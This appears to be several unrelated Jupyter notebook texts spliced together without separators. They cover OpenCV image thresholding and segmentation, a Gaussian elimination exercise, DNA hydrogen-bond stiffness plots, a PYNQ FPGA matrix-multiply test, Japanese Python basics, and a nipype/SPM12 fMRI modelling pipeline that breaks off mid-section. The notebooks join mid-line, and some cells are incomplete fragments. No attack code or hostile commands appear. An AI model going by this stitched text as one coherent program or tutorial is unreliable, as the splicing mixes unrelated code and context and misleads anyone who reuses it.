`opencv` library to perform thresholding, filtering, mathematical morphology and image segmentation.%matplotlib inline import cv2 import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm from ipywidgets import interact plt.rcParams['figure.figsize'] = [12, 8] from matplotlib.colors import LinearSegmentedColormap def getRandomColorMap(num_colors, bg_color=1): colors = np.random.rand(num_colors, 3) * 0.75 colors[0, :] = bg_color colors = tuple(map(tuple, colors)) labelColorMap = LinearSegmentedColormap.from_list('labelColorMap', colors, N=num_colors) return labelColorMap def multiplot(lines, rows, images, cmap, title, vmin=None, vmax=None): plt.figure(figsize=(20,10)) for i in np.arange(lines*rows): plt.subplot(lines, rows, i+1) plt.imshow(images[i], cmap=cmap[i], vmax=vmax) plt.title(title[i]) plt.xticks([]) plt.yticks([]) plt.show()1. Thresholding Compute and display the histogram of a grayscale image Basic thresholding with python Thresholding with OpenCVDetermine the v1 and v2 values for the following threshold types: cv.THRESH_BINARY$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_BINARY_INV$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_TRUNC$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_TO_ZERO$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$cv.THRESH_TO_ZERO_INV$$\text{th_image}(x,y)=\left\{ \begin{array}{ll} \texttt{v1} & \text{if img$(x,y)$ > thresh}\\ \texttt{v2} & \text{otherwise} \end{array} \right.$$ Otsu's thresholdingIn the previous examples, we had to chose the threshold value. We can use Otsu's algorithm to determine it. Otsu's algorithm by partsYou can fine-tune the result by applying this algorithm on the different parts of the image. 2. Filtering Gaussian noise Uniform, Gaussian and bilateral filtering Salt and pepper noise Median filtering 3. Mathematical morphology Non uniform lightningdef non_uniform_lightning_like(img, weight): width = img.shape[1] height = img.shape[0] steps_y = np.arange( start=0.0, stop=1.0, step=1.0/height) light_gradient_y = np.cos( ( 2.0 * ( steps_y * steps_y - steps_y) + 1.0)* np.pi)[:,np.newaxis] steps_x = np.arange( start=0.0, stop=1.0, step=1.0/width) light_gradient_x = np.cos( steps_x * np.pi)[np.newaxis,:] return ( weight * light_gradient_y * light_gradient_x) nul = non_uniform_lightning_like(rice, 50) rice_nul = np.clip(rice + nul, 0, 255).astype(np.uint8) multiplot(1, 3, (rice, nul, rice_nul), (cm.gray, cm.gray, cm.gray), ('Original Image', 'Non Uniform Lightning', 'Image + Non Uniform Lightning'))Erosion and dilation Local adaptation 4. Segmentation Thresholding and connected components labelling PreprocessingClosing -> Gaussian filtering -> Thresholding -> Connected components labelling Blob featuredef draw_blob_bounding_boxes(img, conn_comp): num_labels = conn_comp[0] stats = conn_comp[2] img_bb = cv2.cvtColor( img, cv2.COLOR_GRAY2RGB) for label in range( 1, num_labels): topleft = tuple( stats[label,:2]) bottomright = tuple( stats[label,:2] + stats[label, 2:4]) cv2.rectangle( img_bb, topleft, bottomright, (255,0,0), 3) return img_bb def draw_blob_centroids(img, conn_comp): num_labels = conn_comp[0] centroids = conn_comp[3] img_ctr = cv2.cvtColor( img, cv2.COLOR_GRAY2RGB) for label in range( 1, num_labels): centroid = tuple( centroids[label,:].astype(int)) cv2.circle( img_ctr, centroid, 3, (255,0,0), thickness=3) return img_ctrSolving linear equations with Gaussian elimination# import the numpy package in the np namespace import numpy as np # this line will load the plotting function into the namespace plt. import matplotlib.pyplot as plt # the following lines prevent Python from opening new windows for figures. %matplotlib inlinePart 1: Implement Gaussian elimination In this part you are asked to implement Gaussian elimination as presented in the lectures. It is recommended to implement separate functions for generating the reduced row echelon form, and for solving it. Below I have used the method of gaussian elimination discussed in lectures to solve systems of linear equations. These could be of the form: $$Ax = B$$Where $A$ is a square matrix of coefficients, $B$ is a column matrix of constants and $x$ is a column matrix of unknown variables to be solved.To do this I have:- Made a function called "reduced_row_echelon" which calculates the reduced row echelon form as an augmented matrix $A|B$. - I have then made a function called "solve_echelon" which uses an augmented matrix in reduced row echelon form to solve and produce a column matrix of the unknown variables $x$ to be found.- Finally i have made a function called "gaussian_elimination" which uses both of the functions above to implement the whole guassian elimination process, allowing users to easily input $A$ and $B$ instantly outputting $x$.def reduced_row_echelon( A, B ): """ Calculates the reduced row echelon form using two matrices 'A' and 'B'. The augmented matrix (A|B) in reduced row echelon form is returned. Arguments: 'A': Matrix ceofficient. 'B': Column matrix of constants. Caveats: 'A' must be of square form. 'B' must have the same number of rows as 'A'. """ #Ensure 'A' is square. rows_a, columns_a = np.shape( A ) assert rows_a == columns_a, 'A is not a square matrix.' #Ensure 'B' has 1 column, and same number of rows as 'A'. rows_b, columns_b = np.shape( B ) assert rows_b == rows_a, 'B does not have the same number of rows as A.' #Form the augmented matrix. augmented_matrix = np.c_[A, B] pivot_row = 0 #Assign the pivot to the next diagonal location, until end of matrix is reached. while pivot_row < rows_a: pivot = augmented_matrix[pivot_row, pivot_row] #Iterate down the pivot column, by accessing the rows. for row in range( pivot_row, rows_a ): if row == pivot_row: #If diagonal location, make this value 1. augmented_matrix[row] /= pivot normalised_row = augmented_matrix[row] #Otheriwse zero the rest of the elements below. else: element_to_zero = augmented_matrix[row, pivot_row] #Exploit that the normalised row will always have 1 in this column. augmented_matrix[row] -= normalised_row*element_to_zero pivot_row += 1 return augmented_matrix def solve_echelon( echelon_matrix ): """ Solves a matrix in reduced row echelon form, returning a column matrix of the solved variables. Arguments: 'echelon_matrix': The matrix to be solved in reduced row echelon form. Caveats: Only a matrix in reduced row echelon form will function properly. (square matrix augmented with a column constant matrix). """ #Ensure matrix is of correct echelon shape. number_rows, number_columns = np.shape( echelon_matrix ) assert number_columns == 1 + number_rows, 'The matrix is not in the correct echelon form.' #Separate the constants matrix from the reduced row echelon. constants = echelon_matrix[:,number_rows] echelon_matrix = echelon_matrix[:,:number_rows] variables = np.matrix( np.zeros( (number_rows, 1) )) #Initialise variables matrix. #Iterate over rows, starting at bottom of matrix, finishing at the top. for row in range( number_rows - 1, -1, -1 ): #Immediate assignment for the last row in the matrix. if row == number_rows - 1: variables[row] = constants[row] #General case, use matrix product to caluculate the next corresponding unknown variable. else: variables[row] = constants[row] - echelon_matrix[row, row+1:]*variables[row+1:] return variables def gaussian_elimination( A, B ): """ Performs the full guassian elimination algorithm to solve unknown varibles matrix 'x' in equation form 'Ax = B'. A column marix of the solved variables is returned. Arguments: Input the matrices 'A' and 'B' corresponding to this equation. Caveats: 'A' must be of square form. 'B' must have only 1 column and the same number of rows as 'A'. """ #Calculate the solved variables column matrix. solved_variables = solve_echelon( reduced_row_echelon( A, B ) ) return solved_variables #Example used in lectures: A = np.matrix([ [3., 4., 9.], [6., 7., 9.], [9., 10., 11.] ]) B = np.matrix([ [13.], [7.], [3.] ]) print("Variables [x3, x2, x1] are:\n", gaussian_elimination( A, B ))Variables [x3, x2, x1] are: [[-12.] [ 10.] [ 1.]]Part 2: Finding solution to a linear problemIn this part, you will be asked to use the functions you have implemented in part 1 to solve a simple problem. Problem statement You want to find a linear transformation by a set of points before and after the transformation.2a) try with the following set of pointsdef show_before_after(x,y): plt.plot(x[:,0], x[:,1], 'rx', y[:,0], y[:,1], 'go') plt.ylim([-5,5]) plt.xlim([-5,5]) plt.legend(('before', 'after'), loc=4) plt.title('Points before and after transformation') # matrix of points before transformation, one point per row x = np.matrix( [[ 1., 2. ], [ 2., 1. ], [ 0., 3. ], [ 2., 0.5]]) # matrix of points after transformation, one point per row y = np.matrix( [[ 2.75, 3.25 ], [ 3.25, 2.75 ], [ 2.25, 3.75 ], [ 2.875, 2.125]]) show_before_after(x,y) plt.show()We have here a problem of the form $Ax = B$, where $A$ is the transformation matrix to be found, $x$ is a matrix of points before transformation, and $B$ is a matrix of the points after the transformation. From looking at this problem I can see two immediate methods I could implement utilising the functions I have already made.Method 1) Using diagonalisation to calculate inverse.By taking the first two points, I could say that:$$x = \begin{pmatrix} 1 & 2 \\ 2 & 1 \end{pmatrix}$$ and hence: $$B = \begin{pmatrix} 2.75 & 3.25 \\ 3.25 & 2.75 \end{pmatrix}$$#Initialise x x = np.matrix([ [1., 2.], [2., 1.] ]) #Initialise B B = np.matrix([ [2.75, 3.25], [3.25, 2.75] ])To find $A$, I could rearrange to formulate $A = Bx^{-1}$. So I need to calculate $x^{-1}$. This can be achieved by formulating the augmented matrix between $x$ and it's identity matrix:$$[A|I] = \begin{pmatrix} 1 & 2 \\ 2 & 1 \end{pmatrix} | \begin{pmatrix} 1 & 0 \\ 0 & 1 \end{pmatrix}$$identity = np.matrix([ [1., 0.], [0., 1.,] ])I then need to use operations to transform the left hand of the augmented matrix into the identity matrix, this will calculate $x^{-1}$ on the right hand side. I can use my "reduced_row_echelon" function to transform the left hand side into a reduced row echelon. I can then easily follow this up with a simple elementary row operation to produce the identity matrix as follows:#Convert to echelon form. augmented = reduced_row_echelon( x, identity ) print("Echelon form: \n", augmented, "\n") #Convert to Identity form with an elementary row operation. augmented[0] -= augmented[1]*augmented[0, 1] print("Identity form:\n", augmented, "\n")Echelon form: [[ 1. 2. 1. 0. ] [-0. 1. 0.66666667 -0.33333333]] Identity form: [[ 1. 0. -0.33333333 0.66666667] [-0. 1. 0.66666667 -0.33333333]]Now the right hand side is $x^{-1}$. Therefore the final operation to find the transformation matrix $A$ is to perform a matrix product between $B$ and $x^{-1}$:#Discard the left hand side identity matrix. x_inverse = augmented[:,2:4] print("Inverse of x:\n", x_inverse, "\n") #Perform the matrix product between x inverse, and B. transformation = B*x_inverse print("Transformation:\n", transformation)Inverse of x: [[-0.33333333 0.66666667] [ 0.66666667 -0.33333333]] Transformation: [[ 1.25 0.75] [ 0.75 1.25]]And so from above, I can conclude the transformation matrix ($A$) is: $$A = \begin{pmatrix} 1.25 & 0.75 \\ 0.75 & 1.25 \end{pmatrix}$$ Method 2) Simultaneous equation solving, (utilising both my functions).By assuming that the linear transformation matrix is 2x2, this can be modelled as follows:$$\begin{pmatrix} a & b \\ c & d \end{pmatrix}$$ By performing matrix product on each of the first sets of points, and equalling to the corresponding transformed points I can reduce down a set of simultaneous equations that can be used to solve the variables in the matrix:$3a + 3b = 6$$2a + 3.5b = 5.125$$3c + 3d = 6$$2c + 3.5d = 5.875$I can formulate this problem using matrices:Solving for $a$ and $b$:$$\begin{pmatrix} 3 & 3 \\ 2 & 3.5 \end{pmatrix} \begin{pmatrix} a \\ b \end{pmatrix} = \begin{pmatrix} 6 \\ 5.125 \end{pmatrix}$$ Solving for $c$ and $d$:$$\begin{pmatrix} 3 & 3 \\ 2 & 3.5 \end{pmatrix} \begin{pmatrix} c \\ d \end{pmatrix} = \begin{pmatrix} 6 \\ 5.875 \end{pmatrix}$$ I implement this below:ab_coefficients = np.matrix([ [3., 3.], [2., 3.5,] ]) ab_constants = np.matrix([ [6.], [5.125] ]) cd_coefficients = np.matrix([ [3., 3.], [2., 3.5,] ]) cd_constants = np.matrix([ [6.], [5.875] ]) #Perform the full gaussian elimination. ab = gaussian_elimination( ab_coefficients, ab_constants ) cd = gaussian_elimination( cd_coefficients, cd_constants ) print("a and b solutions: \n", ab, "\n") print("c and d solutions: \n", cd, "\n") #construct the transformation matrix from the answers. transformation = np.vstack( [ab.T, cd.T] ) print("transformation:\n", transformation)a and b solutions: [[ 1.25] [ 0.75]] c and d solutions: [[ 0.75] [ 1.25]] transformation: [[ 1.25 0.75] [ 0.75 1.25]]I get the same result as method 1. This method is arguably simpler and utilises both functions.$$\begin{pmatrix} a & b \\ c & d \end{pmatrix} = \begin{pmatrix} 1.25 & 0.75 \\ 0.75 & 1.25 \end{pmatrix}$$ 2b) Test your approach on the following points. Explain what happens.x1 = [ [ 1, 2], [ 2, 4], [-1, -2], [ 0, 0]] y1 = [ [ 5, 10], [10, 20], [-1, -2], [-2, -4]] #Initialise x x = np.matrix([ [1., 2.], [2., 4.] ]) #Initialise B B = np.matrix([ [5., 10.], [10., 20.] ]) identity = np.matrix([ [1., 0.], [0., 1.,] ]) print(reduced_row_echelon( x, identity ))[[ 1. 2. 1. 0.] [ nan nan -inf inf]]Part 1: Single plot for Big 5000ns Windowhost = 'tat_21mer' n_bp = 21 time_label = '0_5000' rootfolder = '/home/ytcdata/bigtraj_fluctmatch/5000ns' h_agent = HBAgent(host, rootfolder, n_bp, time_label) h_agent.initialize_basepair() xticks = range(1, 22) ylim = (-0.5, 26) fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(14,5)) typename = 'type1' resids, klist = h_agent.get_resid_klist_all(typename) ax.plot(resids, klist, '-o', label=typename) typename = 'type2' resids, klist = h_agent.get_resid_klist_all(typename) ax.plot(resids, klist, '-o', label=typename) typename = 'type3' resids, klist = h_agent.get_resid_klist_all(typename) ax.plot(resids, klist, '-o', label=typename) ax.set_title(abbr_hosts[host], fontsize=14) ax.legend(fontsize=14) ax.set_xticks(xticks) ax.axvline(3, color='red', alpha=0.5) ax.axvline(19, color='red', alpha=0.5) for yvalue in range(5,26,5): ax.axhline(yvalue, color='grey', alpha=0.1) ax.tick_params(axis='both', labelsize=14) ax.set_xlabel('Resid', fontsize=14) ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=14) ax.set_ylim(ylim) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_hb.svg') plt.show()Part 2: Split-5host = 'tat_21mer' bigtraj_folder = '/home/ytcdata/bigtraj_fluctmatch/split_5' n_bp = 21 only_central = False split_5 = True one_big_window = False h_agent = HBAgentBigTraj(host, bigtraj_folder, n_bp, only_central, split_5, one_big_window) h_agent.initialize_basepair() xticks = range(1, 22) ylim = (-0.5, 26) fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(14,5)) typename = 'type1' resids, kmean, kstd = h_agent.get_resid_klist_all(typename) ax.errorbar(resids, kmean, yerr=kstd, marker='o', capsize=10, label=typename) typename = 'type2' resids, kmean, kstd = h_agent.get_resid_klist_all(typename) ax.errorbar(resids, kmean, yerr=kstd, marker='o', capsize=10, label=typename) typename = 'type3' resids, kmean, kstd = h_agent.get_resid_klist_all(typename) ax.errorbar(resids, kmean, yerr=kstd, marker='o', capsize=10, label=typename) title = f'{abbr_hosts[host]} Split-5' ax.set_title(title, fontsize=14) ax.legend(fontsize=14) ax.set_xticks(xticks) ax.axvline(3, color='red', alpha=0.5) ax.axvline(19, color='red', alpha=0.5) for yvalue in range(5,26,5): ax.axhline(yvalue, color='grey', alpha=0.1) ax.tick_params(axis='both', labelsize=14) ax.set_xlabel('Resid', fontsize=14) ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=14) #ax.set_ylim(ylim) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_split5_hb.svg') plt.show()Part 3: Moving Window, Window Size: 1000nshost = 'atat_21mer' bigtraj_folder = '/home/ytcdata/bigtraj_fluctmatch' n_bp = 21 only_central = False split_5 = False one_big_window = False interval_time = 500 h_agent = HBAgentBigTraj(host, bigtraj_folder, n_bp, only_central, split_5, one_big_window, interval_time) h_agent.initialize_basepair() k_container = h_agent.get_k_container() resid_list = list(range(1, n_bp+1)) typelist = ['type1', 'type2', 'type3'] n_window = 19 # 9, 19, 39 n_points = len(resid_list) * len(typelist) data_type1 = np.zeros((n_window, len(resid_list))) data_type2 = np.zeros((n_window, len(resid_list))) data_type3 = np.zeros((n_window, len(resid_list))) datalist = [data_type1, data_type2, data_type3] for typename, data_type in zip(typelist, datalist): col_id = 0 for resid in resid_list: data_type[:, col_id] = k_container[resid][typename] col_id += 1 fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(8,6), sharey=True) ylim = (-0.5, 13) yticks = range(0,13,2) ax = axes[0] c = 'tab:blue' ax.boxplot(data_type1, patch_artist=True, boxprops=dict(facecolor=c, color='black'), medianprops=dict(color='blue')) title = f'{abbr_hosts[host]} Moving Window' ax.set_title(title) legend_elements = [Patch(facecolor=c, edgecolor='black', label='type1')] ax.legend(handles=legend_elements, loc='upper right') ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=12) for yvalue in range(0,14,2): ax.axhline(yvalue, color='grey', alpha=0.1) ax.set_ylim(ylim) ax.set_yticks(yticks) ax = axes[1] c = 'tab:orange' ax.boxplot(data_type2, patch_artist=True, boxprops=dict(facecolor=c, color='black'), medianprops=dict(color='blue')) legend_elements = [Patch(facecolor=c, edgecolor='black', label='type2')] ax.legend(handles=legend_elements, loc='upper right') ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=12) for yvalue in range(0,14,2): ax.axhline(yvalue, color='grey', alpha=0.1) ax.set_ylim(ylim) ax = axes[2] c = 'tab:green' ax.boxplot(data_type3, patch_artist=True, boxprops=dict(facecolor=c, color='black'), medianprops=dict(color='blue')) legend_elements = [Patch(facecolor=c, edgecolor='black', label='type3')] ax.legend(handles=legend_elements, loc='upper right') ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=12) for yvalue in range(0,14,2): ax.axhline(yvalue, color='grey', alpha=0.1) ax.set_ylim(ylim) ax.set_xlabel('Resid', fontsize=12) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_hb_moving_window_500ns.svg') plt.show() xticks = range(1, 22) ylim = (-0.5, 26) fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(14,5)) resids = range(1,22) sele_frame = 0 typename = 'type1' klist = [k_container[resid][typename][sele_frame] for resid in resids] ax.plot(resids, klist, '-o', label=typename) typename = 'type2' klist = [k_container[resid][typename][sele_frame] for resid in resids] ax.plot(resids, klist, '-o', label=typename) typename = 'type3' klist = [k_container[resid][typename][sele_frame] for resid in resids] ax.plot(resids, klist, '-o', label=typename) title = f'{abbr_hosts[host]} Split-5' ax.set_title(title, fontsize=14) ax.legend(fontsize=14) ax.set_xticks(xticks) ax.axvline(3, color='red', alpha=0.5) ax.axvline(19, color='red', alpha=0.5) for yvalue in range(5,26,5): ax.axhline(yvalue, color='grey', alpha=0.1) ax.tick_params(axis='both', labelsize=14) ax.set_xlabel('Resid', fontsize=14) ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=14) #ax.set_ylim(ylim) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_split5_hb.svg') plt.show()mmult unit testimport numpy as np import cffi from pynq import Overlay # load Base Overlay Overlay("/home/xilinx/pynq/bitstream/base.bit").download() import sys sys.path.append("..") from pynq_chainer import overlays from pynq_chainer import utils from pynq.drivers import xlnk mmu = xlnk.xlnk() mmu.xlnk_reset() mmult = overlays.BinMmult() ffi = cffi.FFI() def debug_cdata(name, cdata, show=True): if not show: return print(name) for i in range(5): print(cdata[i]) dtype = "int" npdtype = np.int32 def test(debug=False): ffi = cffi.FFI() x_size = (1, 32) w_size = (16, 32) x = np.random.randint(-255, 255, x_size) w = np.random.randint(-255, 255, w_size) # HW x_hw = np.where(x>=0, 1, 0).astype(npdtype, copy=True) w_hw = np.where(w>=0, 1, 0).astype(npdtype, copy=True).T.copy() # SW x_sw = np.where(x>=0, 1, -1).astype(np.float32, copy=True) w_sw = np.where(w>=0, 1, -1).astype(np.float32, copy=True) x_nrows, x_ncols = x.shape w_nrows, w_ncols = w.shape y_hw, y_cdata = utils.malloc_cma_ndarray((w_nrows, x_nrows), dtype, npdtype) x_hw, x_cdata = utils.copy_cma_ndarray(x_hw, dtype) #w_, w_cdata = utils.copy_cma_ndarray(w.T.copy(), dtype) w_hw, w_cdata = utils.copy_cma_ndarray(w_hw, dtype) if debug: print('x', x_cdata) print('w', w_cdata) print('y', y_cdata) debug_cdata("x", x_cdata) debug_cdata("w", w_cdata) debug_cdata("y", y_cdata) mmult(x_cdata, w_cdata, y_cdata, w_nrows, x_ncols) debug_cdata("y", y_cdata) y_sw = x_sw.dot(w_sw.T) y_hw = y_hw.T debug_cdata("y", y_cdata) if debug: print("Actual(C):") print(y_hw) print("Expected(NumPy):") print(y_sw) if np.allclose(y_hw, y_sw, rtol=1e-04, atol=1e-04): print("OK") else: print("NG") mmu.cma_free(x_cdata) mmu.cma_free(w_cdata) mmu.cma_free(y_cdata) for i in range(1): test(debug=True) L = 784 M = 32 x_size = (1, 1024) w_size = (1024, 1024) x = np.ones(x_size).astype(npdtype) w = np.ones(w_size).astype(npdtype) x_nrows, x_ncols = x.shape w_nrows, w_ncols = w.shape y, y_cdata = utils.malloc_cma_ndarray((w_nrows, x_nrows), dtype, npdtype) # x, x_cdata = utils.copy_cma_ndarray(x, dtype) # w_, w_cdata = utils.copy_cma_ndarray(w, dtype) w_ = w.T.copy() w_size = (784,1024) x, x_cdata = utils.malloc_cma_ndarray(x_size, dtype, npdtype) w_, w_cdata = utils.malloc_cma_ndarray(w_size, dtype, npdtype) w_.shape %timeit -n 1 -o x.dot(w.T) %timeit -n 1 -o mmult(x_cdata, w_cdata, y_cdata, w_nrows, x_ncols)1 loop, best of 3: 18.6 ms per loopファイル操作f = open('todo.txt', encoding='utf-8') todo_str = f.read() print(todo_str) f.close() with open('todo.txt', encoding='utf-8') as f: todo_str = f.read() print(todo_str) f = open('memo.txt', 'w', encoding='utf-8') f f.write('今日は') f.write('ラーメンが食べたい\n') f.close() f = open('memo.txt', 'a', encoding='utf-8') f.write('夕飯は何にしよう\n') f.close() f = open('photo.png', 'rb') content = f.read() content[:8]モジュールimport calc calc calc.add(1, 2) from calc import add add(1, 2) import calc as c c.add(1, 2) from calc import add, sub add(1, 2) sub(2, 1) from calc import ( add, sub, )標準ライブラリの利用import re m = re.search('(P(yth|l)|Z)o[pn]e?', 'Python') m m[0] m.group(0) m = re.search('py(thon)', 'python') m[0] m[1] re.search('py', 'ruby')Building first level models using _nipype_ and _SPM12_ Base functionality for _megameta_ project------- History* 9/18/19 hychan - include option for using custom event TSV* 4/9/19 cscholz - made small correction to make_contrast_list() (setting: -1/neg_length instead of -1/pos_length)* 4/2/19 mbod - split out processing pipeline for revised workflow* 3/28/19 mbod - update pipeline to include resampling to template & SPM path reference* 3/23/19 mbod - include contrast definition in the config JSON file* 3/9/19 mbod - updates from testing template with `darpa1`* 2/27/19 mbod - modify example notebook to make base functionality notebook----- Description* Set up a nipype workflow to use SPM12 to make first level models for _megameta_ task data (preprocessed using `batch8` SPM8 scripts) in BIDS derivative format ------------------- Template variables* Specify the following values: 1. project name - should be name of folder under `/data00/project/megameta`, e.g. `project1` 2. filename for JSON model specification (should be inside `model_specification` folder), e.g. `p1_image_pmod_likeme.json` 3. TR value in seconds ------------------- Setup* import required modules and define parametersimport os # system functions # NIYPE FUNCTIONS import nipype.interfaces.io as nio # Data i/o import nipype.interfaces.spm as spm # spm import nipype.interfaces.matlab as mlab # how to run matlab import nipype.interfaces.utility as util # utility import nipype.pipeline.engine as pe # pypeline engine import nipype.algorithms.modelgen as model # model specification from nipype.interfaces.base import Bunch from nipype.algorithms.misc import Gunzip from itertools import combinations from nilearn import plotting, image from nistats import thresholding from IPython.display import Image import scipy.io as sio import numpy as np import json import pandas as pd/usr/local/anaconda3/lib/python3.6/importlib/_bootstrap.py:205: ImportWarning: can't resolve package from __spec__ or __package__, falling back on __name__ and __path__ return f(*args, **kwds) /usr/local/anaconda3/lib/python3.6/importlib/_bootstrap.py:205: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88 return f(*args, **kwds)Matlab path# Set the way matlab should be called mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash") # If SPM is not in your MATLAB path you should add it here mlab.MatlabCommand.set_default_paths(PATH_TO_SPM_FOLDER)Parameters* These need to be reformatted to be consistent* as data is not smoothed commented out the `fwhm_size` param - but data probably has a value Load JSON model configJSON_MODEL_FILE = os.path.join('/data00/projects/megameta/scripts/jupyter_megameta/first_level_models', PROJECT_NAME, 'model_specifications', MODEL_SPEC_FILE) with open(JSON_MODEL_FILE) as fh: model_def = json.load(fh) TASK_NAME = model_def['TaskName'] RUNS = model_def['Runs'] MODEL_NAME = model_def['ModelName'] PROJECT_NAME = model_def['ProjectID'] PROJECT_DIR = os.path.join('/data00/projects/megameta', PROJECT_NAME) SUBJ_DIR = os.path.join(PROJECT_DIR, 'derivatives', 'nipype', 'resampled_and_smoothed') task_func_template = "sr{PID}_task-{TASK}_run-0{RUN}_space-MNI152-T1-1mm_desc-preproc_bold.nii" subject_list = [subj for subj in os.listdir(SUBJ_DIR) if os.path.exists(os.path.join(SUBJ_DIR,subj,'medium', 'fwhm_8', task_func_template.format(PID=subj, TASK=TASK_NAME, RUN=1)))] output_dir = os.path.join(PROJECT_DIR,'derivatives', 'nipype','model_{}_{}'.format(TASK_NAME.upper(), MODEL_NAME)) # name of 1st-level output folder working_dir = os.path.join(PROJECT_DIR, 'working', 'nipype', 'workingdir_model_{}_{}'.format(TASK_NAME.upper(), MODEL_NAME)) # name of 1st-level working directory # check to see if output and work directories exist if not os.path.exists(output_dir): os.makedirs(output_dir) if not os.path.exists(working_dir): os.makedirs(working_dir) try: subject_list = [ s for s in subject_list if s not in exclude_subjects ] print('\n\nApplied subject exclusion list:\n\t',' '.join(exclude_subjects)) except: print('\n\nNo subject exclusions applied') try: subject_list = [ s for s in subject_list if s in include_subjects ] print('\n\nApplied subject inclusion list:\n\t',' '.join(include_subjects)) except: print('\n\nNo subject inclusions applied') print('\n\nSUBJECT LIST IS:\n\t', ' '.join(subject_list))No subject exclusions applied No subject inclusions appliedUtility functions for subject info and contrasts Setup design matrix data for subject* need a function to set up the nipype `Bunch` format used * https://nipype.readthedocs.io/en/latest/users/model_specification.html* read the onsets/dur/conditions from task logs and extract needed datadef get_subject_info(subject_id, model_path, DEBUG=False): ''' 1. load model specification from JSON spec file 2. get confound file for subject for task to add to design matrix 3. get task spec CSV for subject for task 4. setup subject info structure ''' import os import pandas as pd import json from nipype.interfaces.base import Bunch def make_pmod(df, conditions, pmods={}, normalize='mean'): pmod = [] for cond in conditions: if not pmods.get(cond): pmod.append(None) else: df2 = df[df.trial_type==cond] pmod_name = pmods.get(cond) #pmod = [pmod] if not type(pmods) is list else pmod # MAKE SURE THERE IS VARIANCE IN PMOD VECTOR if df2[pmod_name].var()==0: #df2[pmod_name]+=0.001 pmod.append(None) continue # APPLY NORMALIZATION if normalize=='mean': df2[pmod_name] = df2[pmod_name] - df2[pmod_name].mean() pmod.append(Bunch(name=[pmod_name], param=[df2[pmod_name].values.tolist() ], poly=[1] )) return pmod def map_spec_to_model(spec_df,model): """ Maps spec trial names to model contrast trials. Args: spec: the events.tsv spec file model: the model.json file Returns: pandas dataframe object """ spec=spec_df.copy() for con in model['Conditions']: spec_trials = model['Conditions'][con] spec.loc[spec.trial_type.isin(spec_trials),'trial_type'] = con spec.onset.sort_values() return spec with open(model_path) as fh: model_def = json.load(fh) pmod = None if not model_def.get('Modulators') else [] TASK_NAME = model_def['TaskName'] TASK_RUNS = model_def['Runs'] MODEL_NAME = model_def['ModelName'] PROJECT_ID = model_def['ProjectID'] condition_names = list(model_def['Conditions'].keys()) PROJECT_DIR = os.path.join('/data00/projects/megameta', PROJECT_ID) SUBJ_DIR = os.path.join(PROJECT_DIR,'derivatives', 'batch8') realign_files = [] subject_info = [] if model_def.get('CustomEventDir'): EVENT_DIR = model_def['CustomEventDir'] else: EVENT_DIR = os.path.join(SUBJ_DIR, subject_id, 'func') # check to see which runs exist for subject # by looking for appropriate events.tsv files # this could (should?) also include looking for the nifti file? runs_for_subj = [run for run in TASK_RUNS if os.path.exists(os.path.join(EVENT_DIR, '{}_task-{}_run-0{}_events.tsv'.format(subject_id, TASK_NAME, run))) ] if DEBUG: print("runs_for_subj", runs_for_subj) print("checked paths:") for run in TASK_RUNS: print('\t', os.path.join(EVENT_DIR, '{}_task-{}_run-0{}_events.tsv'.format(subject_id, TASK_NAME, run))) print("TASK NAME", TASK_NAME) print("pmod", pmod) print("TASK_RUNS", TASK_RUNS) print("subject_id", subject_id) for run_num, _ in enumerate(runs_for_subj,1): events_df = pd.read_csv(os.path.join(EVENT_DIR, '{}_task-{}_run-0{}_events.tsv'.format(subject_id, TASK_NAME, run_num)), sep='\t') onsets_df = map_spec_to_model(events_df, model_def) realign_file = os.path.join(PROJECT_DIR, 'working','nipype', 'workingdir_model_{}_{}'.format(TASK_NAME.upper(),MODEL_NAME), '{}-run-0{}-realign.txt'.format(subject_id, run_num)) confound_file=os.path.join(SUBJ_DIR, subject_id, 'func', '{}_task-{}_run-0{}_desc-confounds-regressors.tsv'.format(subject_id, TASK_NAME, run_num) ) confound_df = pd.read_csv(confound_file, sep='\t') cols_to_use = [ 'TransX','TransY', 'TransZ', 'RotX', 'RotY', 'RotZ'] confound_df[cols_to_use].to_csv(realign_file, header=False, index=False, sep='\t') realign_files.append(realign_file) onsets = [] dur = [] for cond in model_def['Conditions']: onsets.append(onsets_df[onsets_df.trial_type==cond].onset.values) dur.append(onsets_df[onsets_df.trial_type==cond].duration.values) #pmod = make_pmod(rdf, condition_names) if model_def.get('Modulators'): pmod = make_pmod(onsets_df, condition_names, pmods=model_def['Modulators']) subject_info.append(Bunch(conditions=condition_names, onsets=onsets, durations=dur, amplitudes=None, tmod=None, pmod=pmod, regressor_names=None, regressors=None)) DM_regressors = [] for cond in condition_names: DM_regressors.append(cond) if pmod and model_def['Modulators'].get(cond): DM_regressors.append('{}x{}^1'.format(cond, model_def['Modulators'].get(cond))) return subject_info, realign_files, DM_regressorsSet up contrasts* This part 